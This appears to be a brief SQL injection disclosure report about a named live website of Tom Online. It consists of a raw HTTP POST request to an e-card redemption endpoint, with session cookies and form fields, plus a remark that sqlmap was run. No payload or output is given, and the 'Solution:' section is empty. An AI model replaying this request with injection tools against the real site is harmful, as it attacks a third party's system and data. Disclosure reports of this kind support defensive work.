SQL Injection for an important website of Tom Online
POST /redeem/tom_ecardExchange.php HTTP/1.1Content-Length: 191Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://tangyuan.tom.com/Cookie: PHPSESSID=0bfa903262d197b1a2039b9b8ef55db0; tom_test=rPcet0oDU!4!1!1459218920!1459219309!4!0!http://tangyuan.tom.com/redeem/gamecard.php!; Hm_lvt_c8c28ae32adaa8779b879ac75b22046b=1459218921,1459218940,1459219121,1459219310; Hm_lpvt_c8c28ae32adaa8779b879ac75b22046b=1459219310; CNZZDATA2468717=cnzz_eid%3D588013179-1459218920-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1459218920; HMACCOUNT=5BE519892ACDFE21; post_key=ae99bc8d0dacbfbe74b87604e813ab93Host: tangyuan.tom.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*button=%c8%b7%c8%cf%b6%d2%bb%bb&bank=tomecard&card_code=94102&productid=tompay&serviceprovider=tompay&tomyzm=1&tom_name=1&tom_name2=vqdsxsxa
When sqlmap started running, it was just a little tricky ~
Solution: